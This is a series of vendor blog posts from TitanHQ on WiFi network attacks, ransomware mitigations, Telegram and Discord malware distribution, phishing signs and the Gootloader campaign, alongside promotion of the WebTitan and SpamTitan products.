Fake access points and evil twins are among the most common wireless network attacks. They are easy to conduct, require little technical skill, and are very effective. One study indicated more than a third of WiFi hotspot users take no precautions when accessing WiFi hotspots and frequently connect to unsecured networks.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
Packet Sniffing: Interception of Unencrypted Traffic
Research by Kaspersky Lab in 2016 showed more than a quarter of public Wi-Fi hotspots set up in malls were insecure and lacked even basic security controls. A quarter did not encrypt traffic at all, while research conducted by Skycure showed that five of the 10 busiest malls in the USA had risky WiFi networks.
One mall in Las Vegas was discovered to be operating 14 risky WiFi access points. Hackers can use packet sniffers to intercept traffic on unencrypted WiFi networks. Packet sniffing is one of the most common wireless attacks.
These common wireless network attacks are easy on older routers, such as those using WEP encryption. WPA offers better security, WPA2 is better still, or ideally, the new WPA3 encryption protocol should be used if it is supported by your access point.
Wardriving is a technique used to identify and map vulnerable access points. The name comes from the fact that attackers drive around a neighborhood and use a laptop with a GPS device, antenna to identify and record the location of wireless networks. This technique is effective since many WiFi networks used by businesses extend beyond the confines of the building and poor security controls are applied to secure those networks.
Warshipping is a more efficient method of attacking WiFi networks as it allows attacks to be conducted remotely, even if the attacker is not within range of a WiFi network. The tactic was explained by IBM X-Force Red researchers at Black Hat USA. They used cheap (under $100) and easy-to-obtain components to create a single-board computer with WiFi and 3G capabilities that runs on a cell phone battery. The device can be used to locally connect to the WiFi network and send information back to the attackers via the 3G cellular connection.
Since the device is small, it can easily be hidden inside a small package, and getting that package into a building is easy. It can just be mailed. Since the package may be addressed to someone not working it the company, it could sit in the mailroom for a while before it is opened. Since the package can be tracked, the attackers will know when it is in the building. Alternatively, it could be hidden in any number of items from plant pots to teddy bears. If the device is within range of WiFi networks, it could be used to attack those networks.
Hashed network access codes can be sent back to the attackers to crack, and the device can then connect to WiFi networks in the building and harvest data. The device could be used in a man-in-the-middle attack by impersonating an internal WiFi network.
Many businesses use MAC filtering to prevent specific devices from connecting to their WiFi networks. While this is useful for preventing individuals from taking advantage of free WiFi for customers, this method of blocking users can be easily bypassed. It is easy to spoof a MAC address and bypass this filtering control.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Examples of WiFi Network Attacks
Attacks on wireless networks are not just theoretical. Listed below are some examples of common wireless networks attacks that have resulted in the installation of malware or theft of sensitive information. These latest wireless security attacks could easily have been prevented had appropriate security controls been implemented.
Latest Wireless Security Attacks
Tel Aviv Free WiFi Network Hacking Incident
One notable example of how easy it can be for a hacker to take over a WiFi network comes from Tel Aviv. Tel Aviv offers a city-wide free WiFi network, which incorporates basic security controls to keep users secure on the network. However, it did not prove to be as secure as city officials thought.
While commuting home, Tel Aviv resident Amihai Neiderman noticed a new WiFi access point had appeared. The FREE_TLV access point was provided by the city and Neiderman decided to test its security controls. After determining the IP address through which WiFi clients accessed the Internet, he disconnected, scanned the router, and discovered the web-based login interface was run through HTTPS port 443.
While he found no major vulnerabilities, after extensive analysis he identified a buffer overflow vulnerability which he successfully exploited to take full control of the router. By doing so, if he was so inclined, he could have intercepted the traffic from tens of thousands of users.
Toasters Used to Hack Unsecured WiFi Networks
Perhaps not one of the most common WiFi network attacks, but notable nonetheless due to the rise in the use of IoT devices. IoT capability has been incorporated into all manner of devices from toasters to washing machines. These devices can be vulnerable to supply chain attacks – Where hardware is altered to allow the devices to be used to attack WiFi networks. In 2016, Russian officials discovered chips imported from China had been altered and were being used to spread malware that could eavesdrop on unsecured WiFi networks from a range of 200 meters. They were used to infect those networks with malware that could steal information.
In-Flight WiFi Network Hacking from the Ground
Cybersecurity expert Ruben Santamarta has demonstrated it is possible to hack into airline WiFi networks from the ground and view the internet activity of passengers and intercept their information. More worryingly, he was also able to gain access to the cockpit network and SATCOM equipment. He claims the same technique could be used for ships, industrial facilities, and even military installations. He explained how he did it in his “Last Call for SATCOM Security” presentation at the 2018 black hat hacker conference.
Orange Modems Leaking Wi-Fi Passwords
A vulnerability has been identified in Orange LiveBox ADSL modems that causes them to leak the SSID and WiFi passwords in plaintext. The flaw was identified by Bad Packets researchers who observed their honeypots being actively attacked. A search on Shodan showed there are nearly 20,000 vulnerable Orange modems that leak Wi-Fi passwords and SSIDs in plaintext. In many cases, the default credentials of admin/admin were still being used! The flaw means the WiFi networks could easily be attacked remotely. Attackers could change device settings, alter firmware, and even obtain the phone number and conduct a range of other attacks.
WeWork WiFi Security Flaws
WeWork, a provider of custom workspaces, private offices, and on-demand workspaces equipped with high-bandwidth WiFi, has made an error implementing those WiFi networks which makes them far from secure.
WeWork used the same WiFi password at many of its shared offices for several years. To make matters worse, that password was weak and regularly features in the top 25 lists of extremely poor passwords. However, there was no need to guess it as it was available through the WeWork app in plaintext. Such a simple yet serious error placed all users of those workspaces at risk for several years. The researchers investigated several locations in San Francisco and found the same weak password used at multiple locations. Further, the WiFi network was only protected with WPA2 Personal security.
Teemu Airamo checked the security of the workspace he had just moved into and found hundreds of other companies’ devices exposed. Subsequent scans on the WeWork network revealed an enormous amount of sensitive data had been exposed. Password reuse is never a good idea, and neither is using dictionary words or heaven forbid, any of the top 25 lists of shockingly awful passwords.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
WiFi Networks Can be Used to Gain Access to Business Data
Creating a WiFi network for guests is simple. Ensuring it is secure and cannot be used for attacks on the business network or customers requires more thought and effort. Any business that allows customers to make purchases using credit and debit cards is a major target for hackers and poor WiFi security is likely to be exploited sooner or later. The past few years have seen many major attacks that have resulted in malware being installed on POS systems. These are now some of the most common wireless network attacks.
How Can Businesses Prevent the Most Common Wireless Network Attacks?
How can businesses protect against some of the most common wireless network attacks? While it is difficult to prevent the creation of fake WiFi hotspots, there are steps that can be taken to prevent many common wireless network attacks and keep the WiFi network secure.
Isolate the Guest Network
If your business network is not isolated from your guest WiFi network, it could be used to gain access to business data and could place your POS at risk of compromise. Use a router that offers multiple SSIDs – most modern routers have that functionality. These routers often have a guest SSID option or separate guest portal. Make sure it is activated when it is deployed. Alternatively, your wireless router may have a wireless isolation feature that will prevent WiFi users from accessing your internal network and other client devices. If you require multiple access points throughout your establishment, you are likely to need a VLAN or EoIP tunnel configuration – A more complicated setup that will require you to seek professional advice on security.
Encrypt WiFi Traffic with WPA2 or WPA3
If you have an old router that does not support WPA2 encryption it’s time for an upgrade. WPA2 is the minimum standard for WiFi security, and while it can still be cracked, it is time-consuming and difficult. WPA3 has now been released and an upgrade should be considered. You should also make sure that WPS is turned off.
Update Firmware Promptly
All software and devices contain vulnerabilities and require updating. Software should be patched and devices such as routers will need to have their firmware upgraded when new versions are released. Check your device manufacturer’s website periodically for details of firmware updates and ensure your device is updated.
Create a Secure SSID
Your router will have a default SSID name, but this should be changed to personalize it to your business. If you make it easily identifiable, it will reduce the potential for rogue access points to be confused with your own. Ensure that you enforce WPA2 encryption with a shared key and post that information for your customers along with your SSID in a prominent place where they can see it.
Restrict WiFi Access
If your wireless router or access point is too powerful, it could be accessed from outside your premises. Choose a router that allows you to alter the strength of your signal and you can ensure only your customers will use your connection. Also, ensure that your WiFi access point is only available during business hours. If your access points are left unsupervised when your business is closed, it increases the risk of an attack.
Secure Your Infrastructure
Administrator access can be abused, so ensure that your login name and your passwords are secure. If the default credentials are not changed, it will only be a matter of time before they are abused. Change the username from ‘admin’ or any other default username. Set a strong password that includes upper and lower-case letters, at least one number, and a special character. The password must be at least 8 characters although more is better. Alternatively use a 14-character+ passphrase.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Use a Web Filter
A web filtering solution is an essential protection for all WiFi networks. Web filters will prevent users from visiting websites and web pages that are known to have been compromised or have been confirmed as malicious. This will protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. A web filter will also allow you to prevent your network from being used to download or view unacceptable content such as pornography and lets you control bandwidth usage to ensure all customers can enjoy decent Internet speeds.
TitanHQ offers a scalable, easy to deploy, granular web filter for WiFi networks. WebTitan Cloud for WiFi requires no hardware purchases or software downloads as it is 100% cloud-based, can be managed and monitored from any location, and can help protect you against the most common wireless network attacks.
How Does WebTitan Cloud for WiFi Work?
Features of WebTitan Cloud for WiFi
No hardware or software installation required
Quick and easy to implement
Fast: DNS solution provides almost zero additional latency
Supports both static and dynamic IPs addresses
No specialist training required
Protects against all web-based threats
Precision control over the content that can be accessed over WiFi
Instant alerts about users trying to access restricted content
Can be integrated into existing systems for easy management
Available to MSPs and resellers in white-label form
Fully multi-tenanted platform
WebTitan Cloud for WiFi, live all TitanHQ solutions, is available on a free trial for you to evaluate the full solution in your own environment. During the trial, you will receive full product support to ensure you get the most out of your trial.
Contact TitanHQ today to arrange your trial, for details of pricing, or to book a product demonstration. Our Customer Service team will be more than happy to answer any questions you have about the product.
Web Filtering FAQs
How can I make my guest Wi-Fi network secure?
You should change your SSID from the default, set a strong password, enable encryption (WPA2 or WPA3), prevent guests from accessing router settings and local network resources, and set up a web filtering solution to restrict access to potentially harmful web content.
How much does content filtering cost?
You can expect to pay between $1 and $3 per user, per month depending on the Wi-Fi content filtering solution you choose. At TitanHQ, we offer powerful content filtering at an affordable price for all businesses. WebTitan Cloud for Wi-Fi starts at $1.01 per user per month.
What is the best way to block phishing attacks?
Two anti-phishing solutions that businesses should implement are an email security gateway or spam filter to block malicious emails and a web filter to prevent employees from visiting phishing websites, either from links in malicious emails or through web browsing and redirects.
How easy is it to start filtering the Internet?
With WebTitan Cloud for Wi-Fi, content filtering is easy. Simply point your DNS to WebTitan, log in to your web-based user interface, then select the categories of content you want to block. It is that simple. Everything is intuitive and you have additional options if you want more precise control or need to implement different controls for different user groups. If ever you get stuck, you benefit from world-class customer support to get you back on track.
Should I enable SSL inspection?
SSL inspection allows you to inspect traffic to and from encrypted websites. Since most websites now secure the connection between the site and browser, this traffic will be invisible unless you enable SSL inspection. Malicious websites often have SSL certificates and will pose a serious threat if traffic is not inspected.
It has been a particularly bad year for ransomware attacks on businesses. Many of the attacked businesses have been unprepared for a ransomware attack and did not implement sufficient ransomware mitigations. Had proactive steps been taken, many of the attacks could have been prevented.
Recently, the DarkSide ransomware operation attacked a critical infrastructure firm and brought fuel delivery to the Eastern Seaboard in the United States to a halt. The fuel pipelines that delivered 45% of the fuel required by the U.S. East Coast were shut down for 5 days due to the attack. Better preparation and more extensive ransomware mitigations could have prevented the attack or at least hastened recovery. The company could also have avoided the $5 million ransom payment and major losses from disruption to operations.
The DarkSide ransomware gang had also attacked the second largest chemical distribution firm in the United States earlier in May, again causing major disruption to operations. In that case, a ransom of around $4.4 million was paid to the gang for the keys to unlock files and to prevent the release of sensitive business data stolen in the attack. The ransom payment was negotiated down from $7.5 million, and as part of that negotiation and payment process, the attacker provided details about how network access was gained. The attacker had purchased stolen credentials from another threat actor. The DarkSide ransomware affiliate also provided some useful advice – Improve your antivirus software and implement multi-factor authentication. These are two important ransomware mitigations that could well have stopped the attack dead.
These are just two examples of recent attacks by one ransomware gang. There are currently more than 17 ransomware gangs that steal data prior to encrypting files and many more that simply encrypt files and demand a ransom for the keys to unlock the encryption. The threat from ransomware also continues to grow. The Verizon 2021 Data Breach investigations Report shows ransomware attacks increased by 6% in 2020 an accounted for 10% of all data breaches.
Ransomware gangs, and their affiliates that conduct the attacks, use a range of different method to get the network access they need. Vulnerabilities in software and operating systems are exploited, and attacks are conducted on Remote Desktop Protocol (RDP) and remote access solutions such as VPNs. Phishing is commonly used to steal credentials that provide access to accounts, malware such as remote access Trojans are used to gain access to networks, along with several other tactics. Consequently, there is no single cybersecurity measure that can be implemented to block these attacks. Multiple ransomware mitigations are required to block each of the attack vectors.
Ransomware Mitigations to Prevent Attacks and Ensure a Fast Recovery
There are several ransomware mitigations that can be implemented to reduce the risk of ransomware attacks and limit the severity of an attack should a network be compromised.
Implement a robust spam filter – A robust spam filter will block phishing attacks and malware delivered via email. Phishing is one of the most common methods of gaining access to networks.
Implement multi-factor authentication – Stolen credentials, including those obtained in phishing attacks, allow ransomware actors to access networks. Multi-factor authentication is an effective measure for preventing stolen credentials from being used.
Conduct end user security awareness training – Ensure employees know how to identify phishing emails and are taught cybersecurity best practices and discourage risky behavior.
Filter network traffic with a web filter – Implement a web filter to block access to malicious websites and prevent communications with known malicious IP addresses.
Purchase top-grade AV software – Implement an advanced anti-virus solution, ensure it is set to update automatically, and conduct regular scans of all IT assets for malware.
Patch promptly and update software – Prompt patching is important to prevent the exploitation of vulnerabilities. Prioritize patching to address the most critical vulnerabilities first. Most vulnerabilities exploited in attacks are months old, yet patches were not applied. Also ensure software and operating systems are updated regularly.
Restrict access to network resources – Apply the principle of least privilege and severely limit administrative access and the ability to install and execute programs.
Restrict or block Remote Desktop Protocol (RDP) – Assess whether RDP is required and block if possible. If needed, ensure originating sources are restricted and implement multi-factor authentication.
Disable macro scripts in Office files – Disable Office macros on all computers unless there is a business need for allowing them. Open Office files sent via email using Office Viewer software rather than the full Office application.
Use application allowlisting – Only permit applications and systems to execute programs allowed by your security policy. Block the execution of programs from commonly used ransomware locations such as temporary folders and the LocalAppData folder.
Implement a strong backup policy – Ensure backups of critical data are regularly created and tested to ensure file recovery is possible. Store a copy of the backup in a secure offline location.
Implement network segmentation – In the event of an attack, it is important that the attackers cannot access all systems and networks. Use network segmentation to limit the harm that can be caused.
Block inbound connections from Cobalt Strike servers – Also block the use of other post-exploitation tools as far as is possible.
Block inbound connections from anonymization services – Block access from Tor and other anonymization services to IP addresses and ports where external connections are not expected or necessary.
A new version of WebTitan Cloud has been released – WebTitan Cloud 4.16 – that includes support for Azure Active Directory and introduces a new school web filtering solution – WebTitan OTG (on-the-go) for Chromebooks.
The new version of WebTitan Cloud includes DNS Proxy 2.06 which supports filtering of users in Azure Active Directory, in addition to on-premise AD and directory integration for Active Directory. Further directory services will be added to meet customer needs and ensure they can enjoy the benefits of per-user filtering with exceptional ease of management. – Further information on the Azure AD app is available here.
Existing WebTitan customers need do nothing to get the latest WebTitan Cloud release as the solution will be updated automatically.
WebTitan OTG for Chromebooks
Using WebTitan OTG for Chromebooks provides an effective way to apply filtering policies to your Chromebooks from the cloud.
WebTitan OTG for Chromebooks is a new web filtering solution for the education sector that allows schools to carefully control the websites that can be access by students both in the classroom and offsite, including in student’s homes.
Schools can easily devise filtering policies for all pupils or specific age groups and apply those filtering polices in the cloud. The solution allows schools to enforce the use of Safe Search and prevent access to age-inappropriate web content to keep students safe.
WebTitan OTG for Chromebooks delivers fast and effective user- and device-level web filtering and empowers students to discover the Internet in a safe and secure fashion, while also ensuring compliance with federal and state laws such as the U.S. Children’s Internet Protection Act (CIPA).
The solution is cost effective for schools to implement, setup and management is quick and easy, and administrators can schedule or run usage reports on demand and have full visibility into Chromebook users’ online activities and locations. It is also possible to lockdown Chromebooks to prevent students from circumventing the web filtering controls.
As with all WebTitan Cloud solutions, there is no need for any on-premises hardware, no proxies or VPNs required, and there is no impact on Internet speed as filtering takes place at the DNS-level before any content is downloaded.
“This new release comes after an expansive first quarter. The launch of WebTitan Cloud 4.16 brings phenomenal new security features to our customers,” Said TitanHQ CEO, Ronan Kavanagh. “After experiencing significant growth in 2020, TitanHQ expects these product enhancements and new features to make 2021 another record-breaking year.”
Telegram is a popular messaging app that has seen user numbers soar in recent months, with many users of WhatsApp making the change to Telegram after recent changes to the WhatsApp privacy and data management policies.
Telegram has also proven popular with cybercriminals who are using the app for distributing and communicating with malware. Recently, a campaign has been identified involving a new malware variant dubbed ToxicEye. ToxicEye malware is a Remote Access Trojan (RAT) that gives an attacker full control of an infected device. The malware is used to steal sensitive data and download other malware variants.
The malware uses a Telegram account for its command and control server communications. Through the attacker’s Telegram account, they can communicate with a device infected with ToxicEye, exfiltrate data, and deliver additional malicious payloads.
It is easy to see the attraction with using Telegram for malware communication. First, the app is popular. The Telegram app was the most popular app in January 2021, having amassed more than 63 million downloads, and has around 500 million active users worldwide. During the pandemic the app has been adopted by many businesses who have been using it to allow their remote workers to communicate and collaborate. The app supports secure, private messaging and most businesses allow Telegram to be used and do not block or inspect communications.
Setting up a Telegram account is easy and attackers can remain anonymous. All that is required to set up an account is a mobile phone number, and the communication infrastructure allows attackers to easily exfiltrate data and send files to malware-infected devices undetected.
Telegram is also being used for distributing malware. Attackers can create an account, use a Telegram bot to interact with other users and send files, and it is also possible to send files to non-Telegram users via phishing emails with malicious attachments. It is phishing emails that are being used to deliver ToxicEye malware. Emails are sent with a .exe file attachment, with one campaign using a file named “paypal checker by saint.exe” to install the malware.
If the attachment is opened and run, a connection will be made to Telegram which allows malware to be downloaded by the attacker’s Telegram bot. The attackers can perform a range of malicious activities once the malware is installed, with the primary goals of the attackers being gathering information about the infected device, locating and exfiltrating passwords, and stealing cookies and browser histories.
ToxicEye malware can kill active processes and take control of Task Manager, record audio and video, steal clipboard contents, and deploy other malware variants – such as keyloggers and ransomware.
TitanHQ offers two solutions that can protect against ToxicEye and other Telegram-based phishing and malware campaigns. SpamTitan is a powerful email security solution that will block malicious emails delivering the executable files that install the ToxicEye RAT and other malware. For even greater protection, SpamTitan should be combined with WebTitan web security. WebTitan is a DNS-based web filtering solution that can be configured to block access to Telegram if it is not in use and monitor traffic in real time to identify potentially malicious communications.
For further information on both of these solutions, details of pricing, and to register for a free trial, contact TitanHQ today.
Cloud-based instant messaging platforms have allowed individuals to easily communicate and collaborate, but cybercriminals are also benefitting from these platforms and are abusing the services for a range of malicious purposes. Discord is one such platform that has been favored by cybercriminals for several years and is now being extensively used for phishing and malware distribution.
Discord is a VoIP, instant messaging and digital distribution platform that has been extensively adopted by the gaming community and latterly by a much broader range of users. In 2019, Discord has amassed around 150 million users worldwide and usership has grown considerably since then. The platform has long been abused by cybercriminals who have used the platform’s live chat feature for selling and trading stolen data, such as gift cards and login credentials, for anonymous communications, and the platform has also been abused to act as C2 servers for communicating with malware-infected devices.
In 2021, the platform has been increasingly used for distributing a wide range of malware variants such as information stealers, cryptocurrency miners, Remote Access Trojans, and ransomware by abusing the cdn.discordapp.com service.
Discord, like other collaboration apps, use content delivery networks (CDNs) for storing shared files within channels. Cybercriminals can upload malicious files to Discord and create a public link for sharing, and that link can be shared with anyone, not just Discord users. The URL generated for sharing starts with https://cdn.discordapp.com/ so anyone receiving the link will see that the link is for a legitimate site. While there are controls to prevent malicious files from being uploaded, oftentimes cybercriminals can bypass those protections have get their malicious files hosted, and warnings are not always displayed to users about the risk of downloading files from Discord. Since the malicious payloads are delivered via encrypted HTTPS, the downloads can be hidden from security solutions.
Further, once uploaded, the malware can be deleted from a chat, but it is still accessible using the public URL. Users are often tricked into downloading these malicious files under the guise of pirated software or games. Gamers have been targeted as their PCs typically have a high spec for gaming, which makes them ideal for cryptocurrency mining.
This method of malware distribution allows malware developers and distributers to easily distribute their malicious payloads with a high degree of anonymity. An analysis by Zscaler identified more than 100 unique malware samples from Discord in the Zscaler cloud in just a two-month period. Another analysis of Discord CDN results identified around 20,000 results on VirusTotal.
Discord is far from the only communication and collaboration solution to be abused. Slack and Telegram are similarly being abused in phishing campaigns and for malware distribution.
How TitanHQ Can Improve Your Organization’s Security Posture
TitanHQ offers two cybersecurity solutions that can be configured to block the use of these legitimate platforms in the workplace and stop malicious links from being distributed to their employees. WebTitan is a powerful but easy-to-use DNS filtering and web security solution that can be configured to block access to sites such as Discord, thus preventing employees from visiting malicious content. Since WebTitan performs malware scans in real time, if malicious files are encountered, employees will be prevented from downloading them. WebTitan supports HTTPS (SSL) inspection so can decrypt, scan, then re-encrypt traffic to identify and block malicious content.
Malicious links to Discord are often distributed via phishing emails. SpamTitan Email Security prevents malicious emails from being delivered to inboxes, such as emails containing links to Discord, Telegram, or other services that are abused by cybercriminals and used to host phishing kits or malware.
Both solutions work seamlessly together to protect against email- and web-based cyberattacks and prevent credential theft, and malware and ransomware attacks. Both solutions are cost effective to implement and easy-to-use and are much loved by IT staff who benefit from a high level of protection coupled with a low management overhead.
If you want to improve protection from email and web-based attacks, contact TitanHQ today to find out more about these award-winning cybersecurity solutions. Both solutions are available on a free trial and a product demonstration can be arranged on request.
Further, these solutions have been developed to be MSP-friendly, with a range of benefits for managed service providers who want to want to improve email and web security for their clients.
Do you want to help the workforce learn how to identify fake emails to stop them divulging their credentials on phishing websites or inadvertently downloading malware onto their computers? In this post we outline some of the signs of phishing emails that everyone should be looking for every time an email is opened to confirm whether it is legitimate or if it is likely a phishing email, email impersonation scam, or poses a network security threat.
What Threats are Sent via Email?
Email is the most common way for cybercriminals to breach company defenses. It has been estimated that 91% of all cyberattacks start with a phishing email. Phishing is the name given to an attempt to obtain sensitive information by deception, often by impersonated a trusted entity. Phishing can occur over the telephone, text message, social media networks, or instant messenger services, but most commonly phishing occurs via email. Phishing emails also deceive people into downloading malicious files that install malware or ransomware. One response to a phishing email is all it takes for cybercriminals to obtain login details that allow them to access email accounts and cloud services and steal large quantities of sensitive data or gain the foothold they need for an extensive compromise of a business network.
If you have a powerful email security solution installed, the majority of phishing emails and other email threats will be blocked, but no email security solution will provide complete protection, so everyone needs to learn how to identify fake emails and know what they should do if such an email is received.
Employees Must be Receive Security Awareness Training
In certain industries, security awareness training for the workforce is mandatory and it is necessary to teach employees how to identify fake emails. In the United States, for example, regular security awareness training is a requirement of the Health Insurance Portability Act (HIPAA). All healthcare organizations must ensure that their employees can identify fake emails such as those used for phishing.
Even if not required by law, security awareness training is strongly advised. Employees cannot be expected to know the difference between a genuine and a scam email if they are not taught what to look for. By providing this training regularly you can condition your employees to always conduct checks to identify fake emails, which will help you to prevent costly data breaches.
How to Identify Fake Emails!
Cybercriminals regularly change their tactics, techniques and procedures to evade security defenses and fool people into divulging sensitive information or installing malware. The themes of malicious emails and lures in phishing emails often change, but there are commonalities in many of these scams which are detailed below. A scam or phishing email may include one or more of these tactics or techniques.
Be aware that just because an email appears to have been sent from a known and trusted email address or person, or a company with the right branding and logos, it does not mean that the email is genuine. You should still carefully check the message before responding or taking any action suggested in the message.
Phishing and scam emails usually have a sense of urgency. Attackers want you to act quickly without thinking, as the longer you take, the more likely it is you will identify the email for what it really is.
Phishing and scam emails often include a threat of negative consequences if no action is taken. Your account will be closed, you will lose access to a service, you will have to pay a fine, or you will be arrested, are all common ways to convey urgency and get people to take the action suggested in the email.
Scammers often use FOMO, bargains, or rewards to encourage people to get in touch or visit a website. A too-good-to-be-true offer such as a new iPhone for $100 or a prize in a competition that you haven’t entered is a common ruse to get people to click a malicious link.
Requests for Sensitive Information
The easiest way to obtain sensitive information is simply to ask for it. You should stop, think, and carefully consider any request to send sensitive information via email. Make sure the email address – not just the display name – is correct and try to call to confirm requests to send sensitive information or change payment details using verified contact information – Not contact information supplied in the email.
Hyperlinks are often included to get past email security defenses and direct individuals to scam websites. The URL is often masked with different text so hover your mouse arrow over the link to find the destination URL. URL shortening services are often used to hide the true destination URL. The URL linked in a message may also not be the destination URL as you may be redirected via multiple websites before landing on a page. Make sure you carefully check the URL and any domain you land on. If in doubt, do not click hyperlinks in emails.
Attachments are often used with double extensions to make them appear legitimate (.doc.exe). Simply opening these files is all it takes to install malware. Macros are often used that contain code that will download malware if they are allowed to run. Scan email attachments with AV software before opening and do not enable content unless you are 100% sure the attachment is genuine. Always treat email attachments as suspicious, and never open a file with an unfamiliar, unusual, or suspicious extension (.zip, .scr, .js, .exe, .vbs, .bat, .com, .msi, .jse, .lnk, .vb etc.)
Irregular email addresses and domains
Often the display name and the actual email address will be very different. Make sure you check the actual address used. Companies do not use public email domains (the part after the @) such as Gmail. Check that the domain is actually the one used by a company i.e., paypal.com is genuine; pay–pal.com is not. Also check that the domain is spelled correctly and there are no missing or transposed letters. Look out for potential alternative characters such as an rn instead of an m, a zero instead of an o, and a 1 instead of an I.
Spelling and grammar
Scammers are good at scamming, but often not so good at spelling. Many attackers do not speak English as their first language, so mistakes are often made with spelling and grammar. These mistakes can be deliberate to ensure only people who are likely to fall for the next stage of the scam respond.
Malicious emails often convince people to take out of the ordinary actions, such as requests to help out a colleague or boss by buying gift cards. Any out-of-band request should be confirmed with a quick phone call, but not using any contact information supplied in the email.
Odd salutations and message tone
How messages are addressed is a good indicator of whether the message is genuine. Most emails from companies now address recipients by name. If Netflix emails you and addresses you as Dear Customer, it could well be a scam. Attackers will probably not be used to the tone of emails usually sent when they conduct email impersonation attacks and may be overly familiar or unnaturally formal.
Block More Email Threats with an Advanced Email Security Solution
Many phishing and scam emails are highly sophisticated and are very difficult to distinguish from genuine emails, even by employees who have been trained how to identify fake emails. Messages can be sent from genuine email accounts that have been compromised, past message threads can be hijacked, and genuine logos and layouts used when companies are spoofed. Training the workforce how to identify fake emails is important, but you also need an advanced spam filtering solution in place to ensure the vast majority of these emails are blocked and not delivered to inboxes.
If you want to improve your defenses against email attacks, contact the TitanHQ team and ask about SpamTitan. SpamTitan is an easy to use, powerful email security solution that will keep you protected from scams and emerging and zero-day email threats. Furthermore, SpamTitan is one of the most cost-effective email security solutions on the market for businesses of all sizes.
The disruption to learning from a pandemic that has lasted more than a year is bad enough, but many schools have experienced even more disruption just as many have opened their gates and allowed students back into classrooms. The SARS-CoV-2 virus may have been brought under control thanks to lockdown measures and the rollout of vaccines, but another type of virus is proving to be a major threat – ransomware.
FBI Warns of Targeted Ransomware Attacks on K12 Schools and Higher Education
Ransomware attacks on schools have been stepped up in recent months and schools and higher education institutions are being actively targeted. In the United States, the Federal Bureau of Investigation recently issued an alert to the education sector warning about the threat of attacks involving Pysa ransomware. The threat actors behind this ransomware variant have been actively targeting K12 schools, higher education, and seminaries. Buffalo City Schools were forced to close their schools in March following a ransomware attack that crippled their IT systems, just before students were about to return to classrooms as part of a phased reopening of schools.
The ransomware is deployed manually after compromising the network. The attack often starts with a phishing email, which gives the attackers the foothold in the network they need. They then conduct reconnaissance, move laterally, and compromise entire networks before deploying their ransomware.
Prior to running the encryption routine that cripple IT systems, the attackers steal sensitive data. Files containing student information are obtained and threats are issued to publish or sell the stolen data if the ransom is not paid. The gang, like many others, has a leak site and routinely follows through on the threat.
Spike in Ransomware Attacks on UK Schools
Ransomware attacks on schools are not confined to the United States. The Pysa ransomware gang is also targeting schools in the United Kingdom and many other countries, and the Pysa gang is not alone. Many other ransomware operations have been attacking schools.
Following a rise in ransomware attacks on UK schools, the UK’s National Cyber Security Centre (NCSC) issued an alert to educational institutions about the growing threat of attacks. NCSC has observed an increase in ransomware attacks on schools from late February 2021, which coincides with students returning to classrooms after an extensive period of school closures due to the pandemic.
The NCSC said there is no reason to believe that these attacks are being conducted by the same criminal group. This appears to be the work of multiple threat groups. These attacks have caused varying levels of disruption, including rendering entire networks inoperable, disabling email and websites, and hampering the ability of students to learn. In some cases, students have lost coursework as a result of the attacks, records of COVID-19 tests have been rendered inaccessible, and school financial records have been lost.
Unfortunately, even paying the ransom is no guarantee of being able to recover encrypted files. While the attackers claim they have the keys to unlock the encryption, they may not be provided. There is also no guarantee that stolen data will be deleted when the ransom is paid. There have been many cases when further ransom demands have been issued after payment has been made.
Adopt a Defense in Depth Strategy to Block Ransomware Attacks
The Department for Education (DfE) has recently urged UK schools to review their cybersecurity defenses and take the necessary steps to harden their defenses against cyberattacks. The NCSC explained that there is no single cybersecurity solution that will provide protection against these attacks. What is required is a defense in depth approach to security.
Defense in depth means implementing multiple overlapping layers of security. If one layer fails to block an attack, others are in place to block the attack.
In practice this means good patch management – applying updates to software, firmware, and operating systems promptly. Antivirus software must be installed on all devices and be kept up to date. Spam filtering solutions should be implemented to block the phishing emails that give the attackers access to the network. These filters can also be used to block email attachments that are not typically received.
Web filters should be used to block access to malicious websites. These filters inspect the content of websites to determine if it is malicious. They also categorize web content, and the filters allow schools to carefully control the types of content that students and staff can access to reduce risk.
Multi factor authentication should be implemented on all remote access points and email accounts, remote access ports that are not being used should be blocked, and a VPN should be used for remote access. The rule of least privilege should be applied for remote access and all staff and student accounts.
It is also recommended to prevent all non-administrator accounts from being able to install software, office macros should be disabled, as should autorun on portable devices.
It is also vital that all files are backed up daily and backups tested to make sure file recovery is possible. Backups should be stored on non-networked devices and must not be accessible from the systems where the data resides. Ideally, multiple backup copies should be created with at least one stored on an air-gaped device.
The threat actors behind Gootloader compromise vulnerable WordPress websites and inject hundreds of pages of fake content, often totally unrelated to the theme of the website. A broad range of websites have been compromised across many industry sectors, including retail, education, healthcare, travel, music, and many more, with the common denominator that they all use the WordPress CMS.
It is not clear how the WordPress sites have been compromised. It is possible that the sites have not been updated to the latest WordPress version or had vulnerable plugins that were exploited. Legitimate admin accounts could be compromised using brute force tactics, or other methods used.
The content added to the compromised sites takes the format of forum posts and fake message boards, providing specific questions and answers. The questions are mostly related to specific types of legal agreements and other documents. An analysis of the campaign by eSentire researchers found most of the posts on the compromised websites contained the word “agreement”. The posts have a question, such as “Do I need a party wall agreement to sell my house?” with a post added below using the exact same search term that users can click to download a template agreement.
These pages have very specific questions for which there are few search engine listings, so when search engines crawl the websites, the content ranks highly in the SERPs for that specific search term. There may be relatively few individuals searching for these particular search terms on the likes of Google, but the majority of those that do are looking for a sample agreements to download.
The content added to the websites contains malicious code that displays the malicious forum posts only to visitors from specific locations, with an underlying blog post that at first appears legitimate, but mostly contains gibberish. The blog post will be displayed to all individuals who are not specifically being targeted.
The campaign is using black hat SEO techniques to get the content listed in the SERPs, which will eventually be removed by the likes of Google; however, that process may take some time.
TitanHQ is proud to announce three of its innovative products have been named winners at the Experts Insights’ 2021 Best-Of Awards in the Web Security, Email Security Gateway, and Email Archiving categories.
